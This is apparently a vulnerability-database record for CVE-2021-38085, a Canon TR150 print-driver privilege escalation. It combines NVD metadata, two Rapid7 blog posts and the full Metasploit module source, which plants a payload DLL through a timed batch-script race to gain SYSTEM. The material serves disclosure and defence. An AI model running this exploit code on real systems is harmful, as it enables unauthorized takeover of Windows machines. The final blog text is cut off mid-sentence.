The Canon TR150 print driver through 3.71.2.10 is vulnerable to a privilege escalation issue. During the add printer process, a local attacker can overwrite CNMurGE.dll and, if timed properly, the overwritten DLL will be loaded into a SYSTEM process resulting in escalation of privileges. This occurs because the driver drops a world-writable DLL into a CanonBJ %PROGRAMDATA% location that gets loaded by printisolationhost (a system process).
{"id": "CVE-2021-38085", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-38085", "description": "The Canon TR150 print driver through 3.71.2.10 is vulnerable to a privilege escalation issue. During the add printer process, a local attacker can overwrite CNMurGE.dll and, if timed properly, the overwritten DLL will be loaded into a SYSTEM process resulting in escalation of privileges. This occurs because the driver drops a world-writable DLL into a CanonBJ %PROGRAMDATA% location that gets loaded by printisolationhost (a system process).", "published": "2021-08-11T18:15:00", "modified": "2022-05-03T16:04:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38085", "reporter": "cve@mitre.org", "references": ["https://defcon.org/html/defcon-29/dc-29-speakers.html#baines", "http://packetstormsecurity.com/files/163795/Canon-TR150-Driver-3.71.2.10-Privilege-Escalation.html", "https://raw.githubusercontent.com/jacob-baines/vuln_disclosure/main/vuln_2021_03.txt", "https://www.youtube.com/watch?v=vdesswZYz-8"], "cvelist": ["CVE-2021-38085"], "immutableFields": [], "lastseen": "2022-05-04T17:21:26", "viewCount": 35, "enchantments": {"dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1358590931647264988"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/CANON_DRIVER_PRIVESC/"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163795"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057"]}], "rev": 4}, "score": {"value": 2.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1358590931647264988"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163795"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057"]}]}, "exploitation": null, "vulnersScore": 2.8}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/o:canon:pixma_tr150_firmware:3.71.2.10"], "cpe23": ["cpe:2.3:o:canon:pixma_tr150_firmware:3.71.2.10:*:*:*:*:*:*:*"], "cwe": ["CWE-732"], "affectedSoftware": [{"cpeName": "canon:pixma_tr150_firmware", "version": "3.71.2.10", "operator": "le", "name": "canon pixma tr150 firmware"}], "affectedConfiguration": [{"name": "canon pixma tr150", "cpeName": "canon:pixma_tr150", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:canon:pixma_tr150_firmware:3.71.2.10:*:*:*:*:*:*:*", "versionEndIncluding": "3.71.2.10", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:canon:pixma_tr150:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://defcon.org/html/defcon-29/dc-29-speakers.html#baines", "name": "https://defcon.org/html/defcon-29/dc-29-speakers.html#baines", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/163795/Canon-TR150-Driver-3.71.2.10-Privilege-Escalation.html", "name": "http://packetstormsecurity.com/files/163795/Canon-TR150-Driver-3.71.2.10-Privilege-Escalation.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://raw.githubusercontent.com/jacob-baines/vuln_disclosure/main/vuln_2021_03.txt", "name": "https://raw.githubusercontent.com/jacob-baines/vuln_disclosure/main/vuln_2021_03.txt", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "https://www.youtube.com/watch?v=vdesswZYz-8", "name": "https://www.youtube.com/watch?v=vdesswZYz-8", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"packetstorm": [{"lastseen": "2021-08-11T17:16:47", "description": "", "cvss3": {}, "published": "2021-08-11T00:00:00", "type": "packetstorm", "title": "Canon TR150 Driver 3.71.2.10 Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-38085"], "modified": "2021-08-11T00:00:00", "id": "PACKETSTORM:163795", "href": "https://packetstormsecurity.com/files/163795/Canon-TR150-Driver-3.71.2.10-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::FileDropper \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Canon Driver Privilege Escalation', \n'Description' => %q{ \nCanon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files \nwithin the \"CanonBJ\" directory and its subdirectories. By overwriting the DLL at \nC:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll \nwith a malicious DLL at the right time whilst running the C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs \nscript to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program, \nwhich runs as NT AUTHORITY\\SYSTEM, to successfully load the malicious DLL. Successful exploitation \nwill grant attackers code execution as the NT AUTHORITY\\SYSTEM user. \n \nThis module leverages the prnmngr.vbs script \nto add and delete printers. Multiple runs of this \nmodule may be required given successful exploitation \nis time-sensitive. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Jacob Baines', # discovery, PoC, module \n'Shelby Pace' # original Ricoh module \n], \n'References' => \n[ \n['CVE', '2021-38085'], \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } \n] \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ UNRELIABLE_SESSION ], \n'Stability' => [ SERVICE_RESOURCE_LOSS ] \n}, \n'DisclosureDate' => '2021-08-07', \n'DefaultTarget' => 0 \n) \n) \n \nself.needs_cleanup = true \nend \n \ndef check \n@driver_path = '' \ndir_name = 'C:\\\\ProgramData\\\\CanonBJ\\\\IJPrinter\\\\CNMWINDOWS\\\\Canon TR150 series' \n \nreturn CheckCode::Safe('No Canon TR150 driver directory found') unless directory?(dir_name) \n \nlanguage_dirs = dir(dir_name) \n \nreturn CheckCode::Detected(\"Detected Canon driver directory, but no language files. Its likely the driver is installed but a printer hasn't been added yet\") unless language_dirs.length \n \n@driver_path = dir_name \n@driver_path.concat('\\\\LanguageModules\\\\040C') \nres = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\") \nvulnerable = res.match(/\\\\Users:(?:\\(I\\))?\\(OI\\)\\(CI\\)\\(F\\)/) \n \nreturn CheckCode::Safe(\"#{@driver_path} directory does not exist or does not grant Users full permissions\") unless vulnerable \n \nvprint_status(\"Vulnerable language driver directory: #{@driver_path}\") \nCheckCode::Appears('Canon language driver directory grants Users full permissions') \nend \n \ndef add_printer(driver_name) \nfail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path) \n \ndll_data = generate_payload_dll \ndll_path = \"#{@driver_path}\\\\CNMurGE.dll\" \n \ntemp_path = expand_path('%TEMP%\\\\CNMurGE.dll') \n \nbat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\") \ncp_cmd = \"copy /y \\\"#{temp_path}\\\" \\\"#{dll_path}\\\"\" \n \n# this script monitors the target dll for modification and then copies \n# over our malicious dll. As this is a time based attack, it won't \n# always be succuessful! \nbat_file = <<~HEREDOC \nattrib -a \"#{dll_path}\" \n:repeat \nfor %%i in (\"#{dll_path}\") do echo %%~ai | find \"a\" >nul || goto :repeat \ntimeout /t 1 \n#{cp_cmd} \nattrib -a \"#{dll_path}\" \nHEREDOC \n \nprint_status(\"Dropping batch script to #{bat_file_path}\") \nwrite_file(bat_file_path, bat_file) \n \nprint_status(\"Writing DLL file to #{temp_path}\") \nwrite_file(temp_path, dll_data) \nregister_files_for_cleanup(bat_file_path, temp_path) \n \nscript_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\" \nbat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\" \nvprint_status('Executing the batch script...') \nclient.sys.process.execute(bat_cmd, nil, { 'Hidden' => true }) \n \nprint_status(\"Adding printer #{@printer_name}...\") \ncmd_exec(script_cmd) \nrescue Rex::Post::Meterpreter::RequestError => e \nfail_with(Failure::Unknown, \"#{e.class} #{e.message}\") \nend \n \ndef exploit \nfail_with(Failure::None, 'Already running as SYSTEM') if is_system? \n \nfail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter' \n \nif sysinfo['Architecture'] != payload.arch.first \nfail_with(Failure::BadConfig, 'The payload should use the same architecture as the target machine') \nend \n \n@printer_name = Rex::Text.rand_text_alpha(5..9) \n@script_path = 'C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs' \ndrvr_name = 'Canon TR150 series' \n \nadd_printer(drvr_name) \nend \n \ndef cleanup \nprint_status(\"Deleting printer #{@printer_name}\") \nsleep(3) \ndelete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\" \nclient.sys.process.execute(delete_cmd, nil, { 'Hidden' => true }) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163795/canon_driver_privesc.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-08-13T19:00:30", "description": "## Print Driver PrivEsc\n\n\n\nIf you attended DEF CON last week, you may have seen [this talk on print driver vulnerabilities](<https://www.youtube.com/watch?v=vdesswZYz-8>) from Metasploit community contributor [Jacob Baines](<https://github.com/jacob-baines>). In the spirit of Friday the 13th, we're highlighting some of these "print nightmares" again, in the form of two new Metasploit modules that Jacob added. \nThe first is a [Canon TR150 Print Driver Local Privilege Escalation module](<https://github.com/rapid7/metasploit-framework/pull/15520>), which exploits [CVE-2021-38085](<https://attackerkb.com/topics/m8dOqLxPtb/cve-2021-38085?referrer=blog>). The second is a [Lexmark Universal Print Driver Local Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15519>) module, which exploits [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>). Both modules target Windows systems with their respective vulnerable print drivers installed, and result in privilege escalation to a `SYSTEM` user.\n\n## Atlassian Crowd RCE\n\nAlso new in this week's release is an [Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE module](<https://github.com/rapid7/metasploit-framework/pull/15501>) by Rapid7's own [Grant Willcox](<https://github.com/gwillcox-r7>), which exploits [CVE-2019-11580](<https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580?referrer=blog>). This vulnerability allows an attacker to upload arbitrary plugins to vulnerable Atlassian Crowd data servers and achieve unauthenticated remote code execution. This module also includes a check method for verifying whether a target is vulnerable to this exploit. It should be noted that this vulnerability made the U.S. Cybersecurity and Infrastructure Security Agency\u2019s (CISA) list of the [12 most routinely exploited vulns for 2020](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>)).\n\n## New module content (3)\n\n * [Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/15501>) by Corben Leo, Grant Willcox, and Paul, which exploits [CVE-2019-11580](<https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580?referrer=blog>) \\- This adds an exploit for CVE-2019-11580 which is an unauthenticated RCE within the Atlassian Crowd application. The vulnerability allows for a malicious JAR file to be loaded, resulting in arbitrary Java code execution within the context of the service.\n * [Canon Driver Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15520>) by Jacob Baines and Shelby Pace, which exploits [CVE-2021-38085](<https://attackerkb.com/topics/m8dOqLxPtb/cve-2021-38085?referrer=blog>) \\- A new module has been added to exploit CVE-2021-38085, a privilege escalation issue in the Canon TR150 Print Driver. Successful exploitation results in code execution as the `SYSTEM` user.\n * [Lexmark Driver Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15519>) by Grant Willcox, Jacob Baines, and Shelby Pace, which exploits [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) \\- A new module has been added to exploit CVE-2021-35449, a privilege escalation issue in a variety of Lexmark drivers including the Universal Print Driver. Successful exploitation allows local attackers to gain `SYSTEM` level code execution.\n\n## Enhancements and features\n\n * [#15327](<https://github.com/rapid7/metasploit-framework/pull/15327>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression issue in the RPC analyze command. Adds automated integration tests to ensure it doesn't break in the future.\n * [#15430](<https://github.com/rapid7/metasploit-framework/pull/15430>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds support for SSH pivoting by adding a new Command Shell session type for SSH clients. This also updates both `auxiliary/scanner/ssh/ssh_login` and `auxiliary/scanner/ssh/ssh_login_pubkey` modules to include these changes. Note that it only supports TCP client connections and only outbound payloads can be used through the SSH pivot at the moment (no reverse payloads).\n * [#15493](<https://github.com/rapid7/metasploit-framework/pull/15493>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Updated Metasploit's dependency on Rails from version 5.2 to 6.1\n * [#15523](<https://github.com/rapid7/metasploit-framework/pull/15523>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This enhances the console output with additional information on why a session may not be compatible with a post module, such as missing Meterpreter commands.\n * [#15535](<https://github.com/rapid7/metasploit-framework/pull/15535>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The `psexec` module has been updated to use the `SMBSHARE` option name instead of `SHARE` for better consistency across modules. Users can still use the old `SHARE` option if needed, however this should be considered deprecated.\n\n## Bugs fixed\n\n * [#15524](<https://github.com/rapid7/metasploit-framework/pull/15524>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the `post/linux/gather/enum_network` module, caused by it searching for language-specific strings in the output to determine success.\n * [#15534](<https://github.com/rapid7/metasploit-framework/pull/15534>) from [timwr](<https://github.com/timwr>) \\- Fixes a regression issue in `post/multi/manage/shell_to_meterpreter` where the generated Powershell command length was greater than the limit of 8192 characters after string obfuscation was applied.\n * [#15536](<https://github.com/rapid7/metasploit-framework/pull/15536>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The HiveNightmare module has been updated to correctly use the `INTERATIONS` option instead of the `NBRE_ITER` option when performing the loop to call `check_path()`. This fixes an issue where the module would hang whilst users were running it, and ensures the loop correctly terminates after a set number of iterations.\n * [#15542](<https://github.com/rapid7/metasploit-framework/pull/15542>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a regression with Meterpreter's initialize methods, which caused Meterpreter scripts to be broken.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.56...6.1.0](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-04T11%3A50%3A27%2B01%3A00..2021-08-12T17%3A57%3A38%2B01%3A00%22>)\n * [Full diff 6.0.56...6.1.0](<https://github.com/rapid7/metasploit-framework/compare/6.0.56...6.1.0>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-08-13T18:25:09", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580", "CVE-2021-35449", "CVE-2021-38085"], "modified": "2021-08-13T18:25:09", "id": "RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "href": "https://blog.rapid7.com/2021/08/13/metasploit-wrap-up-125/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-25T01:34:04", "description": "\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for [CVE-2020-8260](<https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/%E2%80%8B%E2%80%8Bhttps://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as 